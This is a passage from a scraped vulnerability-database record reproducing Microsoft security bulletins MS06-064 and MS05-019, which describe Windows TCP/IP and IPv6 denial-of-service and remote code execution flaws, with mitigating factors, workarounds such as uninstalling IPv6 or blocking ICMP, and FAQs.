IPv4 implementation of TCP/IP. It has been assigned Common Vulnerability and Exposure number CVE-2004-0790. There is a variant of this issue that has been assigned Common Vulnerability and Exposure number CVE-2004-0791. The Microsoft security update for CVE-2004-0790 also addresses CVE-2004-0791.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\n\r\nHow does this vulnerability relate to the vulnerability that is corrected by MS05-019?\r\nMS05-19 addressed the same vulnerability in the more commonly adopted and deployed IPv4 implementation of TCP/IP. This update addresses the vulnerability in the IPv6 implementation.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nTCP Connection Reset Vulnerability - CVE-2004-0230:\r\n\r\nA denial of service vulnerability exists in the IPv6 Windows implementation of TCP. An attacker who successfully exploited this vulnerability could cause the affected system to drop an existing TCP connection.\r\n\t\r\nMitigating Factors for TCP Connection Reset Vulnerability - CVE-2004-0230:\r\n\u2022\t\r\n\r\nAn attacker must be able to predict or discover the IP address and port information of the source and of the destination of an existing TCP network connection. An attacker would also have to predict or to learn certain difficult TCP network packet details. Protocols or programs that maintain long sessions and have predictable TCP/IP information are at an increased risk for this issue.\r\n\u2022\t\r\n\r\nIPv6 support is not installed by default on Windows XP Service Pack 1 and Windows XP Service Pack 2, Windows Server 2003 and Windows Server 2003 Service Pack 1.\r\n\u2022\t\r\n\r\nAn attacker\u2019s system must belong to the same IPv6 network as the target system.\r\n\u2022\t\r\n\r\nFirewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed. Affected systems that allow any TCP connections to the Internet may be vulnerable to this issue.\r\n\u2022\t\r\n\r\nThis attack would have to be performed on each TCP connection that was targeted for reset. Many applications will automatically restore connections that have been reset.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for TCP Connection Reset Vulnerability - CVE-2004-0230:\r\n\r\nMicrosoft has tested the following workarounds. While these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified in the following section.\r\n\u2022\t\r\n\r\nUninstall IPv6.\r\n\r\nFor the IPv6 protocol for Windows XP with SP2, Windows XP with SP1, or Windows Server 2003, do the following:\r\n\r\n1.\r\n\t\r\n\r\nLog on to the computer with a user account that has privileges to change network configuration.\r\n\r\n2.\r\n\t\r\n\r\nClick Start, click Control Panel, and then double-click Network Connections.\r\n\r\n3.\r\n\t\r\n\r\nClick Microsoft TCP/IP version 6 &#40;for Windows XP with SP2 or Windows Server 2003&#41; or Microsoft IPv6 Developer Edition &#40;for Windows XP with SP1&#41;, and then click Uninstall.\r\n\r\n4.\r\n\t\r\n\r\nWhen prompted to confirm the removal of the Microsoft IPv6 Developer Edition or Microsoft TCP/IP version 6 protocol, click OK.\r\n\r\nAlternately, from the Windows XP or Windows Server 2003 desktop do the following:\r\n\r\n1.\r\n\t\r\n\r\nClick Start, point to Programs, point to Accessories.\r\n\r\n2.\r\n\t\r\n\r\nClick Command Prompt.\r\n\r\n3.\r\n\t\r\n\r\nAt the command prompt, type netsh interface ipv6 uninstall.\r\n\r\nImpact of Workaround: Uninstalling IPv6 would result in the system not being able to communicate with other hosts on an IPv6 configured network.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for TCP Connection Reset Vulnerability - CVE-2004-0230:\r\n\r\nWhat is the scope of the vulnerability?\r\nA denial of service vulnerability exists in the IPv6 Windows implementation of TCP. An attacker who successfully exploited this vulnerability could cause the affected system to drop an existing TCP connection.\r\n\r\nWhat causes the vulnerability?\r\nSpecially crafted TCP packets are being parsed when they should be dropped which may cause the reset of an existing connection.\r\n\r\nWhat is IPv6?\r\nInternet Protocol version 6 &#40;IPv6&#41;, a new suite of standard protocols for the network layer of the Internet, is built into Microsoft Windows XP and later. IPv6 is designed to solve many of the problems of the current version of IP &#40;known as IPv4&#41; such as address depletion, security, autoconfiguration, and extensibility. To learn more about IPv6, please read the following Microsoft FAQ for IPv6.\r\n\r\nWhat is TCP/IP?\r\nTCP/IP is a set of networking protocols. TCP/IP includes standards for how computers communicate and conventions for connecting networks and for routing traffic. For more information about TCP/IP, see the following Microsoft Web site.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who exploited this vulnerability could cause the affected system to reset TCP connections.\r\n\r\nWho could exploit the vulnerability?\r\nAny anonymous user who could deliver a specially crafted message to the affected system and learn or predict the required TCP details could try to exploit this vulnerability. An attacker\u2019s system must belong to the same IPv6 network as a target system.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nAn attacker could exploit the vulnerability by creating a specially crafted message and sending the message to an affected system. The message could then cause the affected system to reset TCP connections.\r\n\r\nAn attacker must be able to predict or discover the IP address and port information of the source and of the destination of an existing TCP network connection. An attacker would also have to predict or learn certain difficult TCP network packet details.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nAll affected operating systems are at risk from this vulnerability. However, servers are at primary risk from this vulnerability because they maintain connections with clients that could be vulnerable to the connection reset. Protocols or programs that maintain long sessions and have predictable TCP/IP information are at an increased risk to this issue.\r\n\r\nCould the vulnerability be exploited over the Internet?\r\nYes. An attacker could try to exploit this vulnerability over the Internet.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by modifying the way that the affected operating systems validate TCP requests.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nYes. This vulnerability has been publicly disclosed. It has been assigned Common Vulnerability and Exposure number CVE-2004-0230.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had seen examples of proof of concept code published publicly but had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\n\r\nDoes applying this security update help protect customers from the code that has been published publicly that attempts to exploit this vulnerability?\r\nYes. This security update addresses the proof of concept code that has been publicly published. The vulnerability that has been addressed has been assigned the Common Vulnerability and Exposure number CVE-2004-0230.\r\n\r\nHow does this vulnerability relate to the vulnerability that is corrected by MS05-019?\r\nMS05-19 addressed the same vulnerability in the more commonly adopted and deployed IPv4 implementation of TCP/IP. This update addresses the vulnerability in the IPv6 implementation.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nSpoofed Connection Request Vulnerability - CVE-2005-0688:\r\n\r\nA denial of service vulnerability exists in Windows in the IPv6 implementation of TCP/IP. An attacker who successfully exploited this vulnerability could cause the affected system to stop responding.\r\n\t\r\nMitigating Factors for Spoofed Connection Request Vulnerability - CVE-2005-0688:\r\n\u2022\t\r\n\r\nIPv6 support is not installed by default on Windows XP Service Pack 1, Windows XP Service Pack 2 and Windows Server 2003 and Windows Server 2003 Service Pack 1.\r\n\u2022\t\r\n\r\nAn attacker\u2019s system must belong to the same IPv6 network as the target system.\r\n\u2022\t\r\n\r\nThe affected system return to a normal operational state after the specially crafted packets are finished processing.\r\n\u2022\t\r\n\r\nA typical network deployment scenario would limit the attack to an individual network segment as most routers will not forward these kinds of specially crafted TCP/IP network packets.\r\n\u2022\t\r\n\r\nFirewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed. Affected systems that allow any IP connections to the Internet may be vulnerable to this issue.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Spoofed Connection Request Vulnerability - CVE-2005-0688:\r\n\r\nMicrosoft has tested the following workarounds. While these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified in the following section.\r\n\u2022\t\r\n\r\nUninstall IPv6.\r\n\r\nFor the IPv6 protocol for Windows XP with SP2, Windows XP with SP1, or Windows Server 2003, do the following:\r\n\r\n1.\r\n\t\r\n\r\nLog on to the computer with a user account that has privileges to change network configuration.\r\n\r\n2.\r\n\t\r\n\r\nClick Start, click Control Panel, and then double-click Network Connections.\r\n\r\n3.\r\n\t\r\n\r\nClick Microsoft TCP/IP version 6 &#40;for Windows XP with SP2 or Windows Server 2003&#41; or Microsoft IPv6 Developer Edition &#40;for Windows XP with SP1&#41;, and then click Uninstall.\r\n\r\n4.\r\n\t\r\n\r\nWhen prompted to confirm the removal of the Microsoft IPv6 Developer Edition or Microsoft TCP/IP version 6 protocol, click OK.\r\n\r\nAlternately, from the Windows XP or Windows Server 2003 desktop do the following:\r\n\r\n1.\r\n\t\r\n\r\nClick Start, point to Programs, point to Accessories.\r\n\r\n2.\r\n\t\r\n\r\nClick Command Prompt.\r\n\r\n3.\r\n\t\r\n\r\nAt the command prompt, type netsh interface ipv6 uninstall.\r\n\r\nImpact of Workaround: Uninstalling IPv6 would result in the system not being able to communicate with other hosts on an IPv6 configured network.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Spoofed Connection Request Vulnerability - CVE-2005-0688:\r\n\r\nWhat is the scope of the vulnerability?\r\n\r\nThis is a denial of service vulnerability. An attacker who exploited this vulnerability could cause the affected system to stop responding for a limited time as a result of excessive CPU utilization. During that time, affected systems cannot respond to requests. Note that the denial of service vulnerability would not allow an attacker to execute code or elevate their user rights, but it could cause the affected system to stop accepting requests.\r\n\r\nWhat causes the vulnerability?\r\nThe affected operating systems perform incomplete validation of TCP/IP network packets. This vulnerability occurs when a Transmission Control Protocol &#40;TCP&#41; SYN packet is received with a spoofed source Internet Protocol &#40;IP&#41; address and port number that is identical to that of the destination IP address and port. The effect of this makes it appear that the host computer has sent a packet to itself. If this attack is successful, a loop is created and extra computer CPU time is used.\r\n\r\nWhat is IPv6?\r\nInternet Protocol version 6 &#40;IPv6&#41;, a new suite of standard protocols for the network layer of the Internet, is built into Microsoft Windows XP and later. IPv6 is designed to solve many of the problems of the current version of IP &#40;known as IPv4&#41; such as address depletion, security, autoconfiguration, and extensibility. To learn more about IPv6, please read the following FAQ for IPv6.\r\n\r\nWhat is TCP/IP?\r\nTCP/IP is a set of networking protocols. TCP/IP includes standards for how computers communicate and conventions for connecting networks and for routing traffic. For more information about TCP/IP, see the following. For more information about TCP/IP, see the following Microsoft Web site.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who exploited this vulnerability could cause the affected system to stop responding.\r\n\r\nWho could exploit the vulnerability?\r\nAny anonymous user who could deliver a specially crafted message to the affected system could try to exploit this vulnerability.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nAn attacker could exploit the vulnerability by creating a specially crafted message and sending the message to an affected system. The message could then cause the affected system to stop responding.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nAll affected operating systems are at risk from this vulnerability.\r\n\r\nCould the vulnerability be exploited over the Internet?\r\nYes. An attacker could try to exploit this vulnerability over the Internet. However, this attack requires that routers forward malformed TCP/IP network packets. Most routers will not forward these kinds of malformed TCP/IP network packets.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by modifying the way that the affected operating systems validate TCP/IP requests.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nYes. This vulnerability has been publicly disclosed for the IPv4 implementation of TCP/IP. It has been assigned Common Vulnerability and Exposure number CVE-2005-0688. It also has been named \u201cLand Attack\u201d by the larger security community.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had seen examples of proof of concept code published publicly but had not received any information to indicate that this vulnerability had been publicly used to attack customers using IPv6 when this security bulletin was originally issued.\r\n\r\nDoes applying this security update help protect customers from the code that has been published publicly that attempts to exploit this vulnerability?\r\nYes. This security update addresses the vulnerability that is demonstrated by the existing proof of concept code that has been published.\r\n\r\nHow does this vulnerability relate to the vulnerability that is corrected by MS05-019?\r\nMS05-19 addressed the same vulnerability in the more commonly adopted and deployed IPv4 implementation of TCP/IP. This update addresses the vulnerability in the IPv6 implementation.\r\n\r\nDisclaimer:\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided &quot;as is&quot; without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions: \r\n\u2022\t\r\n\r\nV1.0 &#40;October 10, 2006&#41;: Bulletin published.", "edition": 1, "cvss3": {}, "published": "2006-10-11T00:00:00", "title": "Microsoft Security Bulletin MS06-064 Vulnerabilities in TCP/IP IPv6 Could Allow Denial of Service &#40;922819&#41;", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2004-0791", "CVE-2004-0790", "CVE-2004-0230", "CVE-2005-0688"], "modified": "2006-10-11T00:00:00", "id": "SECURITYVULNS:DOC:14617", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14617", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:12", "description": "Microsoft Security Bulletin MS05-019\r\nVulnerabilities in TCP/IP Could Allow Remote Code Execution and Denial of Service &#40;893066&#41;\r\n\r\nIssued: April 12, 2005\r\nVersion: 1.0\r\nSummary\r\n\r\nWho should read this document: Customers who use Microsoft Windows\r\n\r\nImpact of Vulnerability: Remote Code Execution\r\n\r\nMaximum Severity Rating: Critical\r\n\r\nRecommendation: Customers should apply the update immediately.\r\n\r\nSecurity Update Replacement: None.\r\n\r\nCaveats: Microsoft Knowledge Base Article 893066 documents the currently known issues that customers may experience when they install this security update. The article also documents recommended solutions for these issues. For more information, see Microsoft Knowledge Base Article 893066.\r\n\r\nTested Software and Security Update Download Locations:\r\n\r\nAffected Software:\r\n\u2022\t\r\n\r\nMicrosoft Windows 2000 Service Pack 3 and Microsoft Windows 2000 Service Pack 4 \u2013 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2 \u2013 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows XP 64-Bit Edition Service Pack 1 &#40;Itanium&#41; \u2013 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows XP 64-Bit Edition Version 2003 &#40;Itanium&#41; \u2013 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 \u2013 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 for Itanium-based Systems \u2013 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows 98, Microsoft Windows 98 Second Edition &#40;SE&#41;, and Microsoft Windows Millennium Edition &#40;ME&#41; \u2013 Review the FAQ section of this bulletin for details about these operating systems.\r\n\r\nNon-Affected Software:\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 Service Pack 1\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 with SP1 for Itanium-based Systems\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 x64 Edition\r\n\u2022\t\r\n\r\nMicrosoft Windows XP Professional x64 Edition\r\n\r\nThe software in this list has been tested to determine whether the versions are affected. Other versions either no longer include security update support or may not be affected. To determine the support life cycle for your product and version, visit the Microsoft Support Lifecycle Web site.\r\nTop of sectionTop of section\r\nGeneral Information\r\n\t\r\nExecutive Summary\r\n\r\nExecutive Summary:\r\n\r\nThis update resolves several newly-discovered, privately-reported and public vulnerabilities. Each vulnerability is documented in this bulletin in its own \u201cVulnerability Details\u201d section.\r\n\r\nAn attacker who successfully exploited the most severe of these vulnerabilities could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. However, an attacker who successfully exploited the most severe of these vulnerabilities would most likely cause the affected system to stop responding.\r\n\r\nWe recommend that customers apply the update immediately.\r\n\r\nSeverity Ratings and Vulnerability Identifiers:\r\nVulnerability Identifiers\tImpact of Vulnerability\tWindows 98, 98 SE, ME\tWindows 2000\tWindows XP Service Pack 1\tWindows XP Service Pack 2\tWindows Server 2003\r\n\r\nIP Validation Vulnerability - CAN-2005-0048\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nNot Critical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\r\nICMP Connection Reset Vulnerability - CAN-2004-0790\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nNot Critical\r\n\t\r\n\r\nModerate\r\n\t\r\n\r\nModerate\r\n\t\r\n\r\nModerate\r\n\t\r\n\r\nModerate\r\n\r\nICMP Path MTU Vulnerability - CAN-2004-1060\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nNot Critical\r\n\t\r\n\r\nModerate\r\n\t\r\n\r\nModerate\r\n\t\r\n\r\nModerate\r\n\t\r\n\r\nModerate\r\n\r\nTCP Connection Reset Vulnerability - CAN-2004-0230\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nNot Critical\r\n\t\r\n\r\nLow\r\n\t\r\n\r\nLow\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nLow\r\n\r\nSpoofed Connection Request Vulnerability - CAN-2005-0688\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nNone\r\n\t\r\n\r\nLow\r\n\t\r\n\r\nLow\r\n\r\nAggregate Severity of All Vulnerabilities\r\n\t\r\n\r\n \r\n\t\r\n\r\nNot Critical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nModerate\r\n\t\r\n\r\nModerate\r\n\r\nThis assessment is based on the types of systems that are affected by the vulnerability, their typical deployment patterns, and the effect that exploiting the vulnerability would have on them.\r\n\r\nNote The severity ratings for non x86 operating system versions map to the x86 operating systems versions as follows:\r\n\u2022\t\r\n\r\nThe Microsoft Windows XP 64-Bit Edition Service Pack 1 &#40;Itanium&#41; severity rating is the same as Windows XP Service Pack 1 severity rating.\r\n\u2022\t\r\n\r\nThe Microsoft Windows XP 64-Bit Edition Version 2003 &#40;Itanium&#41; severity rating is the same as Windows XP Service Pack 1 severity rating.\r\n\u2022\t\r\n\r\nThe Microsoft Windows Server 2003 for Itanium-based Systems severity rating is the same as Windows Server 2003 severity rating.\r\nTop of sectionTop of section\r\n\t\r\nFrequently asked questions &#40;FAQ&#41; related to this security update\r\n\r\nWhy does this update address several reported security vulnerabilities?\r\nThis update contains support for several vulnerabilities because the modifications that are required to address these issues are located in related files. Instead of having to install several updates that are almost the same, customers can install only this update.\r\n\r\nDoes this update contain any security-related changes to functionality?\r\nYes. Besides the changes that are listed in each \u201cVulnerability Details\u201d sections of this bulletin, this update includes additional security changes that are based on the result of a security review of the affected components. The default TCPWindowSize registry value has been changed on some operating systems. A new MaxIcmpHostRoutes registry value has also been introduced to control ICMP Path MTU related behavior. Administrators should consider reviewing Microsoft Knowledge Base Article 890345 and Microsoft Knowledge Base Article 896350 for more information about these registry changes prior to installing this security update.\r\n\r\nHow does the extended support for Windows 98, Windows 98 Second Edition, and Windows Millennium Edition affect the release of security updates for these operating systems?\r\nMicrosoft will only release security updates for critical security issues. Non-critical security issues are not offered during this support period. For more information about the Microsoft Support Lifecycle policies for these operating systems, visit the following Web site.\r\n\r\nFor more information about severity ratings, visit the following Web site.\r\n\r\nAre Windows 98, Windows 98 Second Edition, or Windows Millennium Edition critically affected by one or more of the vulnerabilities that are addressed in this security bulletin?\r\nNo. None of these vulnerabilities are critical in severity on Windows 98, on Windows 98 Second Edition, or on Windows Millennium Edition. For more information about severity ratings, visit the following Web site\r\n\r\nI am still using Windows XP, but extended security update support ended on September 30th, 2004. What should I do?\r\n\r\nThe original version of Windows XP, generally known as Windows XP Gold or Windows XP Release to Manufacturing &#40;RTM&#41; version, reached the end of its extended security update support life cycle on September 30, 2004.\r\n\r\nIt should be a priority for customers who have this operating system version to migrate to supported operating system versions to prevent potential exposure to vulnerabilities. For more information about the Windows Service Pack Product Lifecycle, visit the Microsoft Support Lifecycle Web site. For more information about the Windows Product Lifecycle, visit the Microsoft Support Lifecycle Web site.\r\n\r\nFor more information, see the Windows Operating System Product Support Lifecycle FAQ.\r\n\r\nExtended security update support for Microsoft Windows NT 4.0 Workstation Service Pack 6a and Windows 2000 Service Pack 2 ended on June 30, 2004. Extended security update support for Microsoft Windows NT 4.0 Server Service Pack 6a ended on December 31, 2004. I\u2019m still using one of these operating systems, what should I do?\r\n\r\nWindows NT 4.0 Workstation Service Pack 6a, Windows NT 4.0 Server Service Pack 6a, and Windows 2000 Service Pack 2 have reached the end of their life cycles. It should be a priority for customers who have these operating system versions to migrate to supported versions to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit the following Microsoft Support Lifecycle Web site. For more information about the extended security update support period for these operating system versions, visit the Microsoft Product Support Services Web site.\r\n\r\nCustomers who require additional support for Windows NT 4.0 SP6a must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager.\r\n\r\nFor more information, see the Windows Operating System Product Support Lifecycle FAQ.\r\n\r\nCan I use the Microsoft Baseline Security Analyzer &#40;MBSA&#41; to determine whether this update is required?\r\nYes. MBSA will determine whether this update is required. For more information about MBSA, visit the MBSA Web site.\r\n\r\nCan I use Systems Management Server &#40;SMS&#41; to determine whether this update is required?\r\nYes. SMS can help detect and deploy this security update. For information about SMS, visit the SMS Web site. The Security Update Inventory Tool is required for detecting Microsoft Windows and other affected Microsoft products. For more information about the limitations of the Security Update Inventory Tool, see Microsoft Knowledge Base Article 306460\r\nTop of sectionTop of section\r\n\t\r\nVulnerability Details\r\n\t\r\nIP Validation Vulnerability - CAN-2005-0048:\r\n\r\nA remote code execution vulnerability exists that could allow an attacker to send a specially crafted IP message to an affected system. An attacker who successfully exploited this vulnerability could cause the affected system to remotely execute code. However, attempts to exploit this vulnerability would most likely result in a denial of service.\r\n\t\r\nMitigating Factors for IP Validation Vulnerability - CAN-2005-0048:\r\n\u2022\t\r\n\r\nThis attack requires that routers forward malformed IP network packets. Most routers will not forward these kinds of malformed IP network packets.\r\n\u2022\t\r\n\r\nFirewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed. Affected systems that allow any IP connections to the Internet may be vulnerable to this issue.\r\n\u2022\t\r\n\r\nIf enabled, the Internet Connection Firewall does mitigate this vulnerability on Windows XP Service Pack 1. Windows XP Service Pack 2 and Windows Server 2003 were not vulnerable to this issue.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for IP Validation Vulnerability - CAN-2005-0048:\r\n\u2022\t\r\n\r\nISA Server 2000 and ISA Server 2004 can be used to block the affected types of traffic. Please review the ISA Server Preventative Measures Documentation for more information on how to use ISA Server to help mitigate this vulnerability.\r\n\u2022\t\r\n\r\nUse a personal firewall, such as the Internet Connection Firewall, which is included with Windows XP Service Pack 1.\r\n\r\nBy default, the Internet Connection Firewall feature in Windows XP Service Pack 1 helps protect your Internet connection by blocking unsolicited incoming traffic. We recommend that you block all unsolicited incoming communication from the Internet.\r\n\r\nTo enable the Internet Connection Firewall feature by using the Network Setup Wizard, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nClick Start, and then click Control Panel.\r\n\r\n2.\r\n\t\r\n\r\nIn the default Category View, click Network and Internet Connections, and then click Setup or change your home or small office network. The Internet Connection Firewall feature is enabled when you select a configuration in the Network Setup Wizard that indicates that your system is connected directly to the Internet.\r\n\r\nTo configure Internet Connection Firewall manually for a connection, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nClick Start, and then click Control Panel.\r\n\r\n2.\r\n\t\r\n\r\nIn the default Category View, click Networking and Internet Connections, and then click Network Connections.\r\n\r\n3.\r\n\t\r\n\r\nRight-click the connection on which you want to enable Internet Connection Firewall, and then click Properties.\r\n\r\n4.\r\n\t\r\n\r\nClick the Advanced tab.\r\n\r\n5.\r\n\t\r\n\r\nClick to select the Protect my computer or network by limiting or preventing access to this computer from the Internet check box, and then click OK.\r\n\r\nNote If you want to enable certain programs and services to communicate through the firewall, click Settings on the Advanced tab, and then select the programs, the protocols, and the services that are required.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for IP Validation Vulnerability - CAN-2005-0048:\r\n\r\nWhat is the scope of the vulnerability?\r\n\r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could remotely take complete control of an affected system. However, attempts to exploit this vulnerability would most likely result in a denial of service. An attacker who exploited this vulnerability could cause the affected system to stop responding and automatically restart. During that time, affected systems cannot respond to requests.\r\n\r\nWhat causes the vulnerability?\r\nThe affected operating systems perform incomplete validation of IP network packets.\r\n\r\nWhat is IP?\r\nThe Internet Protocol &#40;IP&#41; is part of the TCP/IP protocol suite. TCP/IP is a set of networking protocols that are widely used on the Internet. TCP/IP provides communications across interconnected networks of computers that have diverse hardware architectures and that run various operating systems. TCP/IP includes standards for how computers communicate and conventions for connecting networks and for routing traffic. For more information about TCP/IP, see the following Microsoft Web site.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who successfully exploited this vulnerability could take complete control of the affected system. However, most likely, an attacker who exploited this vulnerability could cause the affected system to stop responding and to automatically restart.\r\n\r\nWho could exploit the vulnerability?\r\nAny anonymous user who could deliver a specially crafted message to the affected system could try to exploit this vulnerability.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nAn attacker could exploit the vulnerability by creating a specially crafted message and sending the message to an affected system. The message could then cause the affected system to execute code or stop responding.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nWindows 2000 and Windows XP Service Pack 1 are primarily at risk from this vulnerability. Windows XP Service Pack 2 and Windows Server 2003 provide additional validation that addresses this vulnerability.\r\n\r\nCould the vulnerability be exploited over the Internet?\r\nYes. An attacker could try to exploit this vulnerability over the Internet. However, this attack requires that routers forward malformed IP network packets. Most routers will not forward these kinds of malformed IP network packets.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by modifying the way that the affected operating systems validate IP requests.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nNo. Microsoft received information about this vulnerability through responsible disclosure. Microsoft had not received any information to indicate that this vulnerability had been publicly disclosed when this security bulletin was originally issued.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nICMP Connection Reset Vulnerability - CAN-2004-0790:\r\n\r\nA denial of service vulnerability exists that could allow an attacker to send a specially crafted Internet Control Message Protocol &#40;ICMP&#41; message to an affected system. An attacker who successfully exploited this vulnerability could cause the affected system to reset existing TCP connections.\r\n\t\r\nMitigating Factors for ICMP Connection Reset Vulnerability - CAN-2004-0790:\r\n\u2022\t\r\n\r\nFirewall best practices and firewall or router configurations that block all ICMP traffic can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed.\r\n\u2022\t\r\n\r\nFor an attacker to try to exploit this vulnerability, they must first predict or learn the IP address and port information of the source and of the destination of an existing TCP network connection.\r\n\u2022\t\r\n\r\nThis attack would have to be performed on each TCP connection that was targeted for reset. Many applications will automatically restore connections that have been reset.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for ICMP Connection Reset Vulnerability - CAN-2004-0790:\r\n\r\nMicrosoft has tested the following workarounds. While these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified in the following section.\r\n\u2022\t\r\n\r\nBlock all ICMP network packets at the firewall or at the router:\r\n\r\nICMP network packets are used to initiate a connection with the affected components. Blocking them at the firewall or at the router will help protect systems that are behind that firewall or router from attempts to exploit this vulnerability. We recommend that you block all unsolicited inbound communication from the Internet. ISA Server 2000 and ISA Server 2004 can be used to block the affected types of traffic.\r\n\r\nImpact of Workaround: This workaround can also negatively impact performance by preventing TCP from optimizing network communication. ICMP network packets can eliminate fragmentation at routers connecting networks with different MTUs. Fragmentation reduces TCP throughput and increases network congestion.\r\n\u2022\t\r\n\r\nBlock ICMP traffic by using IPSec on the affected systems.\r\n\r\nUse Internet Protocol security &#40;IPSec&#41; to help protect network communications. Detailed information about IPSec and about how to apply filters is available in Microsoft Knowledge Base Article 313190 and Microsoft Knowledge Base Article 813878.\r\n\r\nImpact of Workaround: This workaround can also negatively impact performance by preventing TCP from optimizing network communication. ICMP network packets can eliminate fragmentation at routers connecting networks with different MTUs. Fragmentation reduces TCP throughput and increases network congestion.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for ICMP Connection Reset Vulnerability - CAN-2004-0790:\r\n\r\nWhat is the scope of the vulnerability?\r\n\r\nA denial of service vulnerability exists that could allow an attacker to send a specially crafted ICMP message to an affected system. An attacker who successfully exploited this vulnerability could cause the affected system to reset existing TCP connections. Those connections would have to be re-established for normal communication to continue. Note that the denial of service vulnerability would not allow an attacker to execute code or elevate their user rights.\r\n\r\nWhat causes the vulnerability?\r\nThe affected messages are not being ignored in certain cases that allow an attacker to send a malformed packet which may cause the reset of an existing connection.\r\n\r\nWhat is TCP/IP?\r\nTCP/IP is a set of networking protocols that are widely used on the Internet. TCP/IP provides communications across interconnected networks of computers that have diverse hardware architectures and that run various operating systems. TCP/IP includes standards for how computers communicate and conventions for connecting networks and for routing traffic. For more information about TCP/IP, see the following Microsoft Web site.\r\n\r\nWhat is ICMP?\r\nInternet 